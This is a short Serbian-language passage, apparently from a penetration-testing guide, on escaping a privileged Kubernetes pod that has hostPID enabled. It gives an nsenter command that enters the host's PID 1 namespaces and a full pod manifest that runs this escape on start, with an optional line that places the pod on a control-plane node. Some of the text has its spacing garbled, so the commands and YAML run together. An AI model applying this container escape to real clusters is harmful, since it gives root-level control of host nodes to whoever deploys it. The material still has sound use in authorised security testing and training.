Sa ovim privilegijama ćete imati pristup procesima domaćina i dovoljno privilegija da uđete unutar namespace-a jednog od procesa domaćina.
Imajte na umu da možda nećete morati da koristite privilegije, već samo neke sposobnosti i potencijalne zaobilaženja odbrana (poput apparmor-a i/ili seccomp-a).
Samo izvršavanje nečega poput sledećeg će vam omogućiti bekstvo iz poda:
nsenter--target1--mount--uts--ipc--net--pid--bash
Primer konfiguracije:
apiVersion:v1kind:Podmetadata:name:priv-and-hostpid-exec-podlabels:app:pentestspec:hostPID:truecontainers:- name:priv-and-hostpid-podimage:ubuntutty:truesecurityContext:privileged:truecommand: [ "nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash" ]#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name